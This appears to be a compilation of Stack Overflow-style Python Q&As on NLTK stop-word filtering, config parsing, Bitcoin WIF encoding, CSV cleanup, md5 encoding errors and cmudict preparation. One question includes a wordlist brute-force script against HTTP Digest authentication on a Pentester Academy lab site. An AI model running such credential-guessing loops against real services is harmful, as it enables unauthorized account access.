Can't avoid stop words in tokens list - python-3.x

I'm normalizing text from a wiki, and one of the tasks is to delete stopwords (items) from the text tokens. But I can't do it; to be more exact, I can't filter out some of the items.
Code:
# coding: utf8
import os
from nltk import corpus, word_tokenize, FreqDist, ConditionalFreqDist
import win_unicode_console
win_unicode_console.enable()
stop_words_plus = ['il', 'la']
text_tags = ['doc', 'https', 'br', 'clear', 'all']
it_sw = corpus.stopwords.words('italian') + text_tags + stop_words_plus
it_path = os.listdir('C:\\Users\\1\\projects\\i')
lom_path = 'C:\\Users\\1\\projects\\l'
it_corpora = []
lom_corpora = []
def normalize(raw_text):
    tokens = word_tokenize(raw_text)
    norm_tokens = []
    for token in tokens:
        if token not in it_sw and token.isalpha() and len(token) > 1:
            token = token.lower()
            norm_tokens.append(token)
    return norm_tokens

for folder_name in it_path:
    path_to_files = 'C:\\Users\\1\\projects\\i\\%s' % (folder_name)
    files_list = os.listdir(path_to_files)
    for file_name in files_list:
        file_path = path_to_files + '\\' + file_name
        text_file = open(file_path, encoding='utf8')
        raw_text = text_file.read()
        norm_tokens = normalize(raw_text)
        it_corpora += norm_tokens

print(FreqDist(it_corpora).most_common(10))
Output:
[('anni', 1140), ('il', 657), ('la', 523), ('gli', 287), ('parte', 276), ('stato', 276), ('due', 269), ('citta', 254), ('nel', 248), ('decennio', 242)]
As you can see, I need to avoid the words 'il' and 'la'. I added them to the list (it_sw) and they are there (I've checked). Then, in the function normalize, I try to filter them out with `if token not in it_sw`, but it doesn't work and I have no idea what's wrong.

You convert your token to lower case only after finding that it is not in it_sw. Is it possible that some of your tokens have upper-case characters? In that case you could adjust your for loop slightly:
for token in tokens:
    token = token.lower()
    if token not in it_sw and token.isalpha() and len(token) > 1:
        norm_tokens.append(token)
By the way, I'm not sure if the performance of your code is important, but if it is, you might get much better performance by checking for the presence of tokens in a set instead of a list. Just change your definition of it_sw to:
it_sw = set(corpus.stopwords.words('italian') + text_tags + stop_words_plus)
You could also change it_corpora into a set, but that would require a few more small changes.
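To see why the set helps, here is a rough sketch with a stand-in word list (not your actual data): a membership test on a list scans it element by element, while a set does a constant-time hash lookup on average.
import timeit

words = ['il', 'la', 'lo'] * 1000        # stand-in for a long stop-word list
words_set = set(words)

# 'zucchero' is absent, which is the worst case for the list scan
print(timeit.timeit("'zucchero' in words", globals=globals(), number=10000))
print(timeit.timeit("'zucchero' in words_set", globals=globals(), number=10000))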

Related

Creating nested dictionary from text file in python3

I have a text file of thousands of blocks like this. For processing, I need to convert it into a dictionary.
Text file Pattern
[conn.abc]
domain = abc.com
id = Mike
token = jkjkhjksdhfkjshdfhsd
[conn.def]
domain = efg.com
id = Tom
token = hkjhjksdhfks
[conn.ghe]
domain = ghe.com
id = Jef
token = hkjhadkjhskhfskdj7979
Another sample data
New York
domain = Basiclink.com
token = eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtpZCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyJ9.eyJhdWQiOiJodHRwczovL21zLmNvbS9zbm93
method = http
username = abc#comp.com
Toronto
domain = hollywoodlink.com
token = eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtpZCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyJ9.eyJhdWQiOiJodHRwczovL21zLmNvbS9zbm93Zmxha2UvsfdsdcHJvZGJjcy1lYXN0LXVzLTIiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMjliODE
method = http
username = abc#comp.com
I would like to convert it into the following.
d1={conn.abc:{'domain':'abc.com','id': 'Mike',token:'jkjkhjksdhfkjshdfhsd'}
conn.def:{'domain':'efg.com', 'id': 'Tom',token:'hkjhjksdhfks'}
conn.ghe:{'domain':'ghe.com', 'id': 'Jef',token:'hkjhadkjhskhfskdj7979'}}
Thanks
Since the input file can have a varying number of lines per block, this code should work.
Assumptions:
Each key (e.g. conn.abc) will start with an opening square bracket and end with a closing square bracket, for example [conn.abc].
Each inner-dictionary key and value will be separated by =.
If the key line can be either [key] or a bare key, then use the line of code below instead of the commented-out line:
elif '=' not in line:
#elif line[0] == '[' and line[-1] == ']':
Code for this is:
with open('abc.txt', 'r') as f:
    d1 = {}
    dkey = None
    for line in f:
        line = line.strip()
        if line == '':
            continue
        elif line[0] == '[' and line[-1] == ']':
            if dkey is not None:
                d1[dkey] = dtemp
            dkey = line[1:-1]
            dtemp = {}
        else:
            # split on the first '=' only, in case a value contains '='
            line_key, line_value = line.split('=', 1)
            dtemp[line_key.strip()] = line_value.strip()
    if dkey is not None:
        d1[dkey] = dtemp
print(d1)
If the input file is:
[conn.abc]
domain = abc.com
id = Mike
token = jkjkhjksdhfkjshdfhsd
[conn.def]
domain = efg.com
id = Tom
dummy = Test
token = hkjhjksdhfks
[conn.ghe]
domain = ghe.com
id = Jef
token = hkjhadkjhskhfskdj7979
The output will be as follows:
{'conn.abc': {'domain': 'abc.com', 'id': 'Mike', 'token': 'jkjkhjksdhfkjshdfhsd'},
'conn.def': {'domain': 'efg.com', 'id': 'Tom', 'dummy': 'Test', 'token': 'hkjhjksdhfks'},
'conn.ghe': {'domain': 'ghe.com', 'id': 'Jef', 'token': 'hkjhadkjhskhfskdj7979'}}
Note that I added dummy = Test as a key/value pair under conn.def, so the output above has that additional key:value pair.
You can use the standard configparser module:
import configparser
config = configparser.ConfigParser()
config.read("name_of_your_file.txt")
Then you can work with config as a standard dictionary:
for name_of_section, section in config.items():
    for name_of_value, val in section.items():
        print(name_of_section, name_of_value, val)
Prints:
conn.abc domain abc.com
conn.abc id Mike
conn.abc token jkjkhjksdhfkjshdfhsd
conn.def domain efg.com
conn.def id Tom
conn.def token hkjhjksdhfks
conn.ghe domain ghe.com
conn.ghe id Jef
conn.ghe token hkjhadkjhskhfskdj7979
Or:
print(config["conn.abc"]["domain"])
Prints:
abc.com
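And if you need the plain nested dict d1 from the question rather than the config object, the conversion is a one-liner (a minimal sketch using only the standard configparser API):
d1 = {section: dict(config[section]) for section in config.sections()}
print(d1['conn.abc'])   # {'domain': 'abc.com', 'id': 'Mike', 'token': 'jkjkhjksdhfkjshdfhsd'}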

Issue producing a valid WIF key with Python 3.6 (Pythonista - iPadOS)

I am having some issues with some code. I have set about a project for creating Bitcoin wallets in an attempt to turn a hobby into a learning experience, whereby I can understand both Python and the Bitcoin protocol in more detail. I have posted here rather than on the Bitcoin site as the question is related to Python programming.
Below I have some code which I have created to turn a private key into a WIF key. I have written this out for clarity rather than for the most optimal coding style, so that I can see all the steps clearly and work on issues. This code was previously a series of lines which I have now reorganized into a class with functions.
I am following the example from this page: https://en.bitcoin.it/wiki/Wallet_import_format
Here is my current code:
import hashlib
import codecs

class wif():
    def private_to_wif(private_key):
        extended_key = wif.create_extended(private_key)
        address = wif.create_wif_address(extended_key)
        return address

    def create_extended(private_key):
        private_key1 = bytes.fromhex(private_key)
        private_key2 = codecs.encode(private_key1, 'hex')
        mainnet = b'80'
        #testnet = b'ef'
        #compressed = b'01'
        extended_key = mainnet + private_key2
        return extended_key

    def create_wif_address(extended_key):
        first_hash = hashlib.sha256(extended_key)
        first_digest = first_hash.digest()
        second_hash = hashlib.sha256(first_digest)
        second_digest = second_hash.digest()
        second_digest_hex = codecs.encode(second_digest, 'hex')
        checksum = second_digest_hex[:8]
        extended_key_chksm = (extended_key + checksum).decode('utf-8')
        wif_address = wif.base58(extended_key_chksm)  # qualified with the class so the name resolves
        return wif_address

    def base58(extended_key_chksm):
        alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
        b58_string = ''
        leading_zeros = len(extended_key_chksm) - len(extended_key_chksm.lstrip('0'))
        address_int = int(extended_key_chksm, 16)
        while address_int > 0:
            digit = address_int % 58
            digit_char = alphabet[digit]
            b58_string = digit_char + b58_string
            address_int //= 58
        ones = leading_zeros // 2
        for one in range(ones):
            b58_string = '1' + b58_string
        return b58_string
I then use a few lines of code to run this, using the example private key from the above guide, as follows:
key = '0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D'
address = wif.private_to_wif(key)
print(address)
I should be getting the output: 5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbTLvyTJ
Instead I’m getting:
5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbWs6eYX
It’s only the last 6 characters that differ!
Any suggestions and help would be greatly appreciated.
Thank you in advance.
Connor
I have managed to find the solution by adding a missing decoding step.
I am posting it so that anyone who runs into a similar issue can see the steps that brought resolution.
def create_wif_address(extended_key):
    extended_key_dec = codecs.decode(extended_key, 'hex')
    first_hash = hashlib.sha256(extended_key_dec)
    first_digest = first_hash.digest()
    second_hash = hashlib.sha256(first_digest)
    second_digest = second_hash.digest()
    second_digest_hex = codecs.encode(second_digest, 'hex')
    checksum = second_digest_hex[:8]
    extended_key_chksm = (extended_key + checksum).decode('utf-8')
    wif_address = wif.base58(extended_key_chksm)
    return wif_address
So above I added a step at the beginning of the function to decode the passed-in variable from a hexadecimal byte string to raw bytes, which is what the hashing algorithms require, and this produced the result I was hoping for. That also explains why only the last six characters differed: the double-SHA-256 checksum is appended to the end of the payload, so hashing the hex string instead of the raw bytes corrupts only the trailing checksum characters.
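With the fixed create_wif_address in place, a quick sanity check against the example values quoted above:
key = '0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D'
address = wif.private_to_wif(key)
assert address == '5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbTLvyTJ'
print(address)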
Connor

How to handle blank lines, junk lines and \n while converting an input file to a CSV file

Below is the sample data in the input file. I need to process this file and turn it into a CSV file. With some help, I was able to convert it to a CSV file, but not fully, since I am not able to handle \n, the junk line (2nd line) and the blank line (4th line). Also, I need help filtering transaction_type, i.e., skipping the "rewrite" transaction type.
{"transaction_type": "new", "policynum": 4994949}
44uu094u4
{"transaction_type": "renewal", "policynum": 3848848,"reason": "Impressed with \n the Service"}
{"transaction_type": "cancel", "policynum": 49494949, "cancel_table":[{"cancel_cd": "AU"}, {"cancel_cd": "AA"}]}
{"transaction_type": "rewrite", "policynum": 5634549}
Below is the code
import ast
import csv

with open('test_policy', 'r') as in_f, open('test_policy.csv', 'w') as out_f:
    data = in_f.readlines()
    writer = csv.DictWriter(
        out_f,
        fieldnames=['transaction_type', 'policynum', 'cancel_cd', 'reason'],
        lineterminator='\n',
        extrasaction='ignore')
    writer.writeheader()
    for row in data:
        dict_row = ast.literal_eval(row)
        if 'cancel_table' in dict_row:
            cancel_table = dict_row['cancel_table']
            cancel_cd = []
            for cancel_row in cancel_table:
                cancel_cd.append(cancel_row['cancel_cd'])
            dict_row['cancel_cd'] = ','.join(cancel_cd)
        writer.writerow(dict_row)
Below is my output; it does not yet handle the junk line, the blank line, or the "rewrite" transaction type.
transaction_type,policynum,cancel_cd,reason
new,4994949,,
renewal,3848848,,"Impressed with
the Service"
cancel,49494949,"AU,AA",
Expected output
transaction_type,policynum,cancel_cd,reason
new,4994949,,
renewal,3848848,,"Impressed with the Service"
cancel,49494949,"AU,AA",
Hmm, I tried to fix this. I don't know how CSV files work, but with my small knowledge I suggest you run this code before converting the file.
txt = {"transaction_type": "renewal",
"policynum": 3848848,
"reason": "Impressed with \n the Service"}
newTxt = {}
for i,j in txt.items():
# local var (temporar)
lastX = ""
correctJ = ""
# check if in J is ascii white space "\n" and get it out
if "\n" in f"b'{j}'":
j = j.replace("\n", "")
# for grammar purpose check if
# J have at least one space
if " " in str(j):
# if yes check it closer (one by one)
for x in ([j[y:y+1] for y in range(0, len(j), 1)]):
# if 2 spaces are consecutive pass the last one
if x == " " and lastX == " ":
pass
# if not update correctJ with new values
else:
correctJ += x
# remember what was the last value checked
lastX = x
# at the end make J to be the correctJ (just in case J has not grammar errors)
j = correctJ
# add the corrections to a new dictionary
newTxt[i]=j
# show the resoult
print(f"txt = {txt}\nnewTxt = {newTxt}")
Terminal output:
txt = {'transaction_type': 'renewal', 'policynum': 3848848, 'reason': 'Impressed with \n the Service'}
newTxt = {'transaction_type': 'renewal', 'policynum': 3848848, 'reason': 'Impressed with the Service'}
Process finished with exit code 0
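For the filtering the question actually asks about, here is a minimal sketch building on the asker's own DictWriter setup (assuming a junk line is anything ast.literal_eval cannot parse):
import ast
import csv

with open('test_policy', 'r') as in_f, open('test_policy.csv', 'w') as out_f:
    writer = csv.DictWriter(
        out_f,
        fieldnames=['transaction_type', 'policynum', 'cancel_cd', 'reason'],
        lineterminator='\n', extrasaction='ignore')
    writer.writeheader()
    for line in in_f:
        line = line.strip()
        if not line:
            continue                      # skip blank lines
        try:
            dict_row = ast.literal_eval(line)
        except (ValueError, SyntaxError):
            continue                      # skip junk lines that are not literals
        if dict_row.get('transaction_type') == 'rewrite':
            continue                      # drop "rewrite" transactions
        if 'reason' in dict_row:
            # collapse embedded newlines and repeated spaces
            dict_row['reason'] = ' '.join(dict_row['reason'].split())
        if 'cancel_table' in dict_row:
            dict_row['cancel_cd'] = ','.join(
                c['cancel_cd'] for c in dict_row['cancel_table'])
        writer.writerow(dict_row)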

Can't get encoding to work in Python 3

I have created a program, and from what I understand from the error shown below and from other posts on Stack Overflow, I need to encode the object before it can be hashed.
I have tried several ways to do this but still keep getting the same error message. Provided below is my code and also a list of changes I have tried.
I understand what needs to be done, but I guess I'm putting the code in the wrong place or the syntax is wrong, as what I am trying isn't working.
Any help is much appreciated.
Error Message
ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()
TypeError: Unicode-objects must be encoded before hashing
Code
import sys
import requests
import hashlib

realm = "Pentester Academy"
lines = [line.rstrip('\n') for line in open('wordl2.txt')]
print(lines)

for user in ['nick', 'admin']:
    get_response = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1")
    test_creds = get_response
    print(test_creds)
    for password in lines:
        # not the correct way but works for this challenge
        snounce = test_creds.headers.get('www-authenticate').split('"')
        uri = "/lab/webapp/digest2/1"
        # create the HTTP Digest
        ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()
        ha2 = hashlib.md5("GET:" + uri).hexdigest()
        response = hashlib.md5(ha1 + ':' + snounce + ':' + ha2).hexdigest()
        header_string = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"' % (user, realm, snounce, uri, response)
        headers = {'Authorization': header_string}
        test_creds = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1", headers=headers)
        if test_creds.status_code == 200:
            print("CRACKED: %s:%s" % (user, password))
            break
        elif test_creds.status_code == 401:
            print("FAILED: %s:%s" % (user, password))
        else:
            print("unexpected Status code: %d " % test_creds.status_code)
Attempted Changes
password.encode(utf-8)
----------------------
hashlib.md5().update(password.encode(lines.encoding))
---------------
lines = [line.rstrip('\n') for line in open('wordl2.txt', "rb")]
I have managed to solve my own problem using the line
pass2 = str.encode(password)
just inside the password for loop
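For reference, here is a minimal sketch of that fix applied to the digest lines (with made-up sample values; str.encode(password) and password.encode() are equivalent, both defaulting to UTF-8):
import hashlib

user, realm, password = 'nick', 'Pentester Academy', 'secret'   # sample values
uri = '/lab/webapp/digest2/1'
# hashlib.md5() needs bytes in Python 3, so encode the assembled strings first
ha1 = hashlib.md5((user + ':' + realm + ':' + password.strip()).encode('utf-8')).hexdigest()
ha2 = hashlib.md5(('GET:' + uri).encode('utf-8')).hexdigest()
print(ha1, ha2)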

How to convert cmudict-0.7b or cmudict-0.7b.dict in to FST format to use it with phonetisaurus?

I am looking for a simple procedure to generate an FST (finite state transducer) from cmudict-0.7b or cmudict-0.7b.dict, which will be used with phonetisaurus.
I tried the following set of commands (the phonetisaurus aligner, Google NGramLibrary and phonetisaurus arpa2wfst) and was able to generate an FST, but it didn't work. I am not sure where I made a mistake or missed a step. I guess the very first command, i.e. phonetisaurus-align, is not correct.
phonetisaurus-align --input=cmudict.dict --ofile=cmudict/cmudict.corpus --seq1_del=false
ngramsymbols < cmudict/cmudict.corpus > cmudict/cmudict.syms
/usr/local/bin/farcompilestrings --symbols=cmudict/cmudict.syms --keep_symbols=1 cmudict/cmudict.corpus > cmudict/cmudict.far
ngramcount --order=8 cmudict/cmudict.far > cmudict/cmudict.cnts
ngrammake --v=2 --bins=3 --method=kneser_ney cmudict/cmudict.cnts > cmudict/cmudict.mod
ngramprint --ARPA cmudict/cmudict.mod > cmudict/cmudict.arpa
phonetisaurus-arpa2wfst-omega --lm=cmudict/cmudict.arpa > cmudict/cmudict.fst
I tried the FST with phonetisaurus-g2p as follows:
phonetisaurus-g2p --model=cmudict/cmudict.fst --nbest=3 --input=HELLO --words
But it didn't return anything.
Appreciate any help on this matter.
It is very important to keep the dictionary in the right format. Phonetisaurus is very sensitive about that: it requires the word and the phonemes to be tab-separated; spaces will not work. It also does not allow the pronunciation variant numbers CMUSphinx uses, like (2) or (3). You need to clean up the dictionary, for example with a simple Python script, before feeding it into Phonetisaurus. Here is the one I use:
#!/usr/bin/python
import sys

if len(sys.argv) != 3:
    print("Split the list on train and test sets")
    print("")
    print("Usage: traintest.py file split_count")
    exit()

infile = open(sys.argv[1], "r")
outtrain = open(sys.argv[1] + ".train", "w")
outtest = open(sys.argv[1] + ".test", "w")

cnt = 0
split_count = int(sys.argv[2])
for line in infile:
    items = line.split()
    # strip pronunciation variant markers such as WORD(2)
    if items[0][-1] == ')':
        items[0] = items[0][:-3]
    # skip entries containing underscores
    if items[0].find("_") > 0:
        continue
    # re-join as word<TAB>phonemes, the format Phonetisaurus expects
    line = items[0] + '\t' + " ".join(items[1:]) + '\n'
    if cnt % split_count == 3:
        outtest.write(line)
    else:
        outtrain.write(line)
    cnt = cnt + 1
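As a quick illustration of what the cleanup does, a made-up cmudict-style entry with a variant marker becomes the tab-separated form Phonetisaurus expects:
line = "HELLO(2)  HH AH L OW"            # made-up entry with a variant marker
items = line.split()
if items[0][-1] == ')':
    items[0] = items[0][:-3]             # "HELLO(2)" -> "HELLO"
print(items[0] + '\t' + " ".join(items[1:]))   # HELLO<TAB>HH AH L OW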
